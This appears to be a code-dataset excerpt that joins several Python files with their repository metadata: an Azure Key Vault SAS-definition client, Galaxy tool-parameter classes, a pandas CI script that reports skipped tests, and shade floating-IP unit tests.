list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_sas_definitions.metadata = {'url': '/storage/{storage-account-name}/sas'} # type: ignore
async def delete_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Deletes a SAS definition from a specified storage account. This operation requires the
storage/deletesas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
async def get_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Gets information about a SAS definition for the specified storage account. This operation
requires the storage/getsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
async def set_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
parameters: "_models.SasDefinitionCreateParameters",
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Creates or updates a new SAS definition for the specified storage account. This operation
requires the storage/setsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:param parameters: The parameters to create a SAS definition.
:type parameters: ~azure.keyvault.v2016_10_01.models.SasDefinitionCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SasDefinitionCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
async def update_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
parameters: "_models.SasDefinitionUpdateParameters",
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Updates the specified attributes associated with the given SAS definition. This operation
requires the storage/setsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:param parameters: The parameters to update a SAS definition.
:type parameters: ~azure.keyvault.v2016_10_01.models.SasDefinitionUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SasDefinitionUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
|
mit
| 5,830,821,531,992,470,000
| 48.203455
| 158
| 0.642438
| false
| 4.210358
| false
| false
| false
|
jmchilton/galaxy-central
|
galaxy/tools/parameters.py
|
1
|
19896
|
"""
Classes encapsulating tool parameters
"""
import logging, string, sys
from galaxy import config, datatypes, util, form_builder
import validation
from elementtree.ElementTree import XML, Element
log = logging.getLogger(__name__)
class ToolParameter( object ):
"""
Describes a parameter accepted by a tool. This is just a simple stub at the
moment but in the future should encapsulate more complex parameters (lists
of valid choices, validation logic, ...)
"""
def __init__( self, tool, param ):
self.tool = tool
self.name = param.get("name")
self.label = util.xml_text(param, "label")
self.help = util.xml_text(param, "help")
self.html = "no html set"
self.validators = []
for elem in param.findall("validator"):
self.validators.append( validation.Validator.from_element( elem ) )
def get_label( self ):
"""Return user friendly name for the parameter"""
if self.label: return self.label
else: return self.name
def get_html( self, trans=None, value=None, other_values={} ):
"""
Returns the html widget corresponding to the paramter.
Optionally attempt to retain the current value specific by 'value'
"""
return self.html
def get_required_enctype( self ):
"""
If this parameter needs the form to have a specific encoding
return it, otherwise return None (indicating compatibility with
any encoding)
"""
return None
def filter_value( self, value, trans=None, other_values={} ):
"""
Parse the value returned by the view into a form usable by the tool OR
raise a ValueError.
"""
return value
def to_string( self, value, app ):
"""Convert a value to a string representation suitable for persisting"""
return str( value )
def to_python( self, value, app ):
"""Convert a value created with to_string back to an object representation"""
return value
def validate( self, value, history=None ):
for validator in self.validators:
validator.validate( value, history )
@classmethod
def build( cls, tool, param ):
"""Factory method to create parameter of correct type"""
param_type = param.get("type")
if not param_type or param_type not in parameter_types:
raise ValueError( "Unknown tool parameter type '%s'" % param_type )
else:
return parameter_types[param_type]( tool, param )
class TextToolParameter( ToolParameter ):
"""
Parameter that can take on any text value.
>>> p = TextToolParameter( None, XML( '<param name="blah" type="text" size="4" value="default" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="default">
>>> print p.get_html( value="meh" )
<input type="text" name="blah" size="4" value="meh">
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.size = elem.get( 'size' )
self.value = elem.get( 'value' )
self.area = str_bool( elem.get( 'area', False ) )
def get_html( self, trans=None, value=None, other_values={} ):
if self.area:
return form_builder.TextArea( self.name, self.size, value or self.value ).get_html()
return form_builder.TextField( self.name, self.size, value or self.value ).get_html()
class IntegerToolParameter( TextToolParameter ):
"""
Parameter that takes an integer value.
>>> p = IntegerToolParameter( None, XML( '<param name="blah" type="integer" size="4" value="10" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="10">
>>> type( p.filter_value( "10" ) )
<type 'int'>
>>> type( p.filter_value( "bleh" ) )
Traceback (most recent call last):
...
ValueError: An integer is required
"""
def filter_value( self, value, trans=None, other_values={} ):
try: return int( value )
except: raise ValueError( "An integer is required" )
def to_python( self, value, app ):
return int( value )
class FloatToolParameter( TextToolParameter ):
"""
Parameter that takes a real number value.
>>> p = FloatToolParameter( None, XML( '<param name="blah" type="integer" size="4" value="3.141592" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="3.141592">
>>> type( p.filter_value( "36.1" ) )
<type 'float'>
>>> type( p.filter_value( "bleh" ) )
Traceback (most recent call last):
...
ValueError: A real number is required
"""
def filter_value( self, value, trans=None, other_values={} ):
try: return float( value )
except: raise ValueError( "A real number is required")
def to_python( self, value, app ):
return float( value )
class BooleanToolParameter( ToolParameter ):
"""
Parameter that takes one of two values.
>>> p = BooleanToolParameter( None, XML( '<param name="blah" type="boolean" checked="yes" truevalue="bulletproof vests" falsevalue="cellophane chests" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="checkbox" name="blah" value="true" checked><input type="hidden" name="blah" value="true">
>>> print p.filter_value( ["true","true"] )
bulletproof vests
>>> print p.filter_value( ["true"] )
cellophane chests
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.truevalue = elem.get( 'truevalue', 'true' )
self.falsevalue = elem.get( 'falsevalue', 'false' )
self.name = elem.get( 'name' )
self.checked = elem.get( 'checked' )
def get_html( self, trans=None, value=None, other_values={} ):
checked = self.checked
if value: checked = form_builder.CheckboxField.is_checked( value )
return form_builder.CheckboxField( self.name, checked ).get_html()
def filter_value( self, value, trans=None, other_values={} ):
if form_builder.CheckboxField.is_checked( value ):
return self.truevalue
else:
return self.falsevalue
def to_python( self, value, app ):
return ( value == 'True' )
class FileToolParameter( ToolParameter ):
"""
Parameter that takes an uploaded file as a value.
>>> p = FileToolParameter( None, XML( '<param name="blah" type="file"/>' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="file" name="blah">
"""
def __init__( self, tool, elem ):
"""
Example: C{<param name="bins" type="file" />}
"""
ToolParameter.__init__( self, tool, elem )
self.html = form_builder.FileField( elem.get( 'name') ).get_html()
def get_required_enctype( self ):
"""
File upload elements require the multipart/form-data encoding
"""
return "multipart/form-data"
def to_string( self, value, app ):
raise Exception( "FileToolParameter cannot be persisted" )
def to_python( self, value, app ):
raise Exception( "FileToolParameter cannot be persisted" )
class HiddenToolParameter( ToolParameter ):
"""
Parameter that takes one of two values.
FIXME: This seems hacky, parameters should only describe things the user
might change. It is used for 'initializing' the UCSC proxy tool
>>> p = HiddenToolParameter( None, XML( '<param name="blah" type="hidden" value="wax so rockin"/>' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="hidden" name="blah" value="wax so rockin">
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.value = elem.get( 'value' )
self.html = form_builder.HiddenField( self.name, self.value ).get_html()
## This is clearly a HACK, parameters should only be used for things the user
## can change, there needs to be a different way to specify this. I'm leaving
## it for now to avoid breaking any tools.
class BaseURLToolParameter( ToolParameter ):
"""
Returns a parameter the contains its value prepended by the
current server base url. Used in all redirects.
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.value = elem.get( 'value', '' )
def get_html( self, trans=None, value=None, other_values={} ):
return form_builder.HiddenField( self.name, trans.request.base + self.value ).get_html()
class SelectToolParameter( ToolParameter ):
"""
Parameter that takes on one (or many) or a specific set of values.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<select name="blah">
<option value="x">I am X</option>
<option value="y" selected>I am Y</option>
<option value="z">I am Z</option>
</select>
>>> print p.get_html( value="z" )
<select name="blah">
<option value="x">I am X</option>
<option value="y">I am Y</option>
<option value="z" selected>I am Z</option>
</select>
>>> print p.filter_value( "y" )
y
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select" multiple="true">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z" selected="true">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<select name="blah" multiple>
<option value="x">I am X</option>
<option value="y" selected>I am Y</option>
<option value="z" selected>I am Z</option>
</select>
>>> print p.get_html( value=["x","y"])
<select name="blah" multiple>
<option value="x" selected>I am X</option>
<option value="y" selected>I am Y</option>
<option value="z">I am Z</option>
</select>
>>> print p.filter_value( ["y", "z"] )
y,z
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select" multiple="true" display="checkboxes">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z" selected="true">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<div><input type="checkbox" name="blah" value="x">I am X</div>
<div><input type="checkbox" name="blah" value="y" checked>I am Y</div>
<div><input type="checkbox" name="blah" value="z" checked>I am Z</div>
>>> print p.get_html( value=["x","y"])
<div><input type="checkbox" name="blah" value="x" checked>I am X</div>
<div><input type="checkbox" name="blah" value="y" checked>I am Y</div>
<div><input type="checkbox" name="blah" value="z">I am Z</div>
>>> print p.filter_value( ["y", "z"] )
y,z
"""
def __init__( self, tool, elem):
ToolParameter.__init__( self, tool, elem )
self.multiple = str_bool( elem.get( 'multiple', False ) )
self.display = elem.get( 'display', None )
self.separator = elem.get( 'separator', ',' )
self.legal_values = set()
self.dynamic_options = elem.get( "dynamic_options", None )
if self.dynamic_options is None:
self.options = list()
for index, option in enumerate( elem.findall("option") ):
value = option.get( "value" )
self.legal_values.add( value )
selected = ( option.get( "selected", None ) == "true" )
self.options.append( ( option.text, value, selected ) )
def get_html( self, trans=None, value=None, other_values={} ):
if value is not None:
if not isinstance( value, list ): value = [ value ]
field = form_builder.SelectField( self.name, self.multiple, self.display )
if self.dynamic_options:
options = eval( self.dynamic_options, self.tool.code_namespace, other_values )
else:
options = self.options
for text, optval, selected in options:
if value: selected = ( optval in value )
field.add_option( text, optval, selected )
return field.get_html()
def filter_value( self, value, trans=None, other_values={} ):
if self.dynamic_options:
legal_values = set( v for _, v, _ in eval( self.dynamic_options, self.tool.code_namespace, other_values ) )
else:
legal_values = self.legal_values
if isinstance( value, list ):
assert self.multiple, "Multiple values provided but parameter is not expecting multiple values"
rval = []
for v in value:
v = util.restore_text( v )
assert v in legal_values
rval.append( v )
return self.separator.join( rval )
else:
value = util.restore_text( value )
assert value in legal_values
return value
class DataToolParameter( ToolParameter ):
"""
Parameter that takes on one (or many) or a specific set of values.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
>>> # Mock up a history (not connected to database)
>>> from galaxy.model import History, Dataset
>>> from cookbook.patterns import Bunch
>>> hist = History()
>>> hist.add_dataset( Dataset( id=1, extension='text' ) )
>>> hist.add_dataset( Dataset( id=2, extension='bed' ) )
>>> hist.add_dataset( Dataset( id=3, extension='fasta' ) )
>>> hist.add_dataset( Dataset( id=4, extension='png' ) )
>>> hist.add_dataset( Dataset( id=5, extension='interval' ) )
>>> p = DataToolParameter( None, XML( '<param name="blah" type="data" format="interval"/>' ) )
>>> print p.name
blah
>>> print p.get_html( trans=Bunch( history=hist ) )
<select name="blah">
<option value="2">2: Unnamed dataset</option>
<option value="5" selected>5: Unnamed dataset</option>
</select>
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.format = datatypes.get_datatype_by_extension( elem.get( 'format', 'data' ).lower() )
self.multiple = str_bool( elem.get( 'multiple', False ) )
self.optional = str_bool( elem.get( 'optional', False ) )
def get_html( self, trans=None, value=None, other_values={} ):
assert trans is not None, "DataToolParameter requires a trans"
history = trans.history
assert history is not None, "DataToolParameter requires a history"
if value is not None:
if type( value ) != list: value = [ value ]
field = form_builder.SelectField( self.name, self.multiple )
some_data = False
for data in history.datasets:
if isinstance( data.datatype, self.format.__class__ ) and not data.parent_id:
some_data = True
selected = ( value and ( data in value ) )
field.add_option( "%d: %s" % ( data.hid, data.name[:30] ), data.id, selected )
if some_data and value is None:
# Ensure that the last item is always selected
a, b, c = field.options[-1]; field.options[-1] = a, b, True
else:
# HACK: we should just disable the form or something
field.add_option( "no data has the proper type", '' )
if self.optional == True:
field.add_option( "Selection is Optional", 'None', True )
return field.get_html()
def filter_value( self, value, trans, other_values={} ):
if not value:
raise ValueError( "A data of the appropriate type is required" )
if value in [None, "None"]:
temp_data = trans.app.model.Dataset()
temp_data.state = temp_data.states.FAKE
return temp_data
if isinstance( value, list ):
return [ trans.app.model.Dataset.get( v ) for v in value ]
else:
return trans.app.model.Dataset.get( value )
def to_string( self, value, app ):
return value.id
def to_python( self, value, app ):
return app.model.Dataset.get( int( value ) )
class RawToolParameter( ToolParameter ):
"""
Completely nondescript parameter, HTML representation is provided as text
contents.
>>> p = RawToolParameter( None, XML(
... '''
... <param name="blah" type="raw">
... <![CDATA[<span id="$name">Some random stuff</span>]]>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html().strip()
<span id="blah">Some random stuff</span>
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
template = string.Template( elem.text )
self.html = template.substitute( self.__dict__ )
# class HistoryIDParameter( ToolParameter ):
# """
# Parameter that takes a name value, makes history.id available.
#
# FIXME: This is a hack (esp. if hidden params are a hack) but in order to
# have the history accessable at the job level, it is necessary
# I also probably wrote this docstring test thing wrong.
#
# >>> from galaxy.model import History, Dataset
# >>> from cookbook.patterns import Bunch
# >>> hist = History( id=1 )
# >>> p = HistoryIDParameter( None, XML( '<param name="blah" type="history"/>' ) )
# >>> print p.name
# blah
# >>> html_string = '<input type="hidden" name="blah" value="%d">' % hist.id
# >>> assert p.get_html( trans=Bunch( history=hist ) ) == html_string
# """
# def __init__( self, tool, elem ):
# ToolParameter.__init__( self, tool, elem )
# self.name = elem.get('name')
# def get_html( self, trans, value=None, other_values={} ):
# assert trans.history is not None, "HistoryIDParameter requires a history"
# self.html = form_builder.HiddenField( self.name, trans.history.id ).get_html()
# return self.html
parameter_types = dict( text = TextToolParameter,
integer = IntegerToolParameter,
float = FloatToolParameter,
boolean = BooleanToolParameter,
select = SelectToolParameter,
hidden = HiddenToolParameter,
baseurl = BaseURLToolParameter,
file = FileToolParameter,
data = DataToolParameter,
raw = RawToolParameter )
def get_suite():
"""Get unittest suite for this module"""
import doctest, sys
return doctest.DocTestSuite( sys.modules[__name__] )
def str_bool(in_str):
"""
returns true/false of a string, since bool(str), always returns true if string is not empty
default action is to return false
"""
if str(in_str).lower() == 'true':
return True
return False
|
mit
| -6,214,418,039,163,646,000
| 39.19596
| 162
| 0.587304
| false
| 3.837963
| false
| false
| false
|
toobaz/pandas
|
ci/print_skipped.py
|
1
|
1409
|
#!/usr/bin/env python
import os
import sys
import math
import xml.etree.ElementTree as et
def parse_results(filename):
tree = et.parse(filename)
root = tree.getroot()
skipped = []
current_class = ""
i = 1
assert i - 1 == len(skipped)
for el in root.findall("testcase"):
cn = el.attrib["classname"]
for sk in el.findall("skipped"):
old_class = current_class
current_class = cn
name = "{classname}.{name}".format(
classname=current_class, name=el.attrib["name"]
)
msg = sk.attrib["message"]
out = ""
if old_class != current_class:
ndigits = int(math.log(i, 10) + 1)
# 4 for : + space + # + space
out += "-" * (len(name + msg) + 4 + ndigits) + "\n"
out += "#{i} {name}: {msg}".format(i=i, name=name, msg=msg)
skipped.append(out)
i += 1
assert i - 1 == len(skipped)
assert i - 1 == len(skipped)
# assert len(skipped) == int(root.attrib['skip'])
return "\n".join(skipped)
def main():
test_files = ["test-data-single.xml", "test-data-multiple.xml", "test-data.xml"]
print("SKIPPED TESTS:")
for fn in test_files:
if os.path.isfile(fn):
print(parse_results(fn))
return 0
if __name__ == "__main__":
sys.exit(main())
|
bsd-3-clause
| -8,257,308,143,200,926,000
| 26.096154
| 84
| 0.515259
| false
| 3.594388
| true
| false
| false
|
openstack-infra/shade
|
shade/tests/unit/test_floating_ip_neutron.py
|
1
|
41101
|
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_floating_ip_neutron
----------------------------------
Tests Floating IP resource methods for Neutron
"""
import copy
import datetime
import munch
from shade import exc
from shade.tests import fakes
from shade.tests.unit import base
class TestFloatingIP(base.RequestsMockTestCase):
mock_floating_ip_list_rep = {
'floatingips': [
{
'router_id': 'd23abc8d-2991-4a55-ba98-2aaea84cc72f',
'tenant_id': '4969c491a3c74ee4af974e6d800c62de',
'floating_network_id': '376da547-b977-4cfe-9cba-275c80debf57',
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'port_id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda7',
'status': 'ACTIVE'
},
{
'router_id': None,
'tenant_id': '4969c491a3c74ee4af974e6d800c62de',
'floating_network_id': '376da547-b977-4cfe-9cba-275c80debf57',
'fixed_ip_address': None,
'floating_ip_address': '203.0.113.30',
'port_id': None,
'id': '61cea855-49cb-4846-997d-801b70c71bdd',
'status': 'DOWN'
}
]
}
mock_floating_ip_new_rep = {
'floatingip': {
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': None,
'router_id': None,
'status': 'ACTIVE',
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
}
mock_floating_ip_port_rep = {
'floatingip': {
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'router_id': None,
'status': 'ACTIVE',
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
}
mock_get_network_rep = {
'status': 'ACTIVE',
'subnets': [
'54d6f61d-db07-451c-9ab3-b9609b6b6f0b'
],
'name': 'my-network',
'provider:physical_network': None,
'admin_state_up': True,
'tenant_id': '4fd44f30292945e481c7b8a0c8908869',
'provider:network_type': 'local',
'router:external': True,
'shared': True,
'id': 'my-network-id',
'provider:segmentation_id': None
}
mock_search_ports_rep = [
{
'status': 'ACTIVE',
'binding:host_id': 'devstack',
'name': 'first-port',
'created_at': datetime.datetime.now().isoformat(),
'allowed_address_pairs': [],
'admin_state_up': True,
'network_id': '70c1db1f-b701-45bd-96e0-a313ee3430b3',
'tenant_id': '',
'extra_dhcp_opts': [],
'binding:vif_details': {
'port_filter': True,
'ovs_hybrid_plug': True
},
'binding:vif_type': 'ovs',
'device_owner': 'compute:None',
'mac_address': 'fa:16:3e:58:42:ed',
'binding:profile': {},
'binding:vnic_type': 'normal',
'fixed_ips': [
{
'subnet_id': '008ba151-0b8c-4a67-98b5-0d2b87666062',
'ip_address': u'172.24.4.2'
}
],
'id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'security_groups': [],
'device_id': 'server-id'
}
]
def assertAreInstances(self, elements, elem_type):
for e in elements:
self.assertIsInstance(e, elem_type)
def setUp(self):
super(TestFloatingIP, self).setUp()
self.fake_server = fakes.make_fake_server(
'server-id', '', 'ACTIVE',
addresses={u'test_pnztt_net': [{
u'OS-EXT-IPS:type': u'fixed',
u'addr': '192.0.2.129',
u'version': 4,
u'OS-EXT-IPS-MAC:mac_addr':
u'fa:16:3e:ae:7d:42'}]})
self.floating_ip = self.cloud._normalize_floating_ips(
self.mock_floating_ip_list_rep['floatingips'])[0]
def test_float_no_status(self):
floating_ips = [
{
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': None,
'router_id': None,
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
]
normalized = self.cloud._normalize_floating_ips(floating_ips)
self.assertEqual('UNKNOWN', normalized[0]['status'])
def test_list_floating_ips(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ips = self.cloud.list_floating_ips()
self.assertIsInstance(floating_ips, list)
self.assertAreInstances(floating_ips, dict)
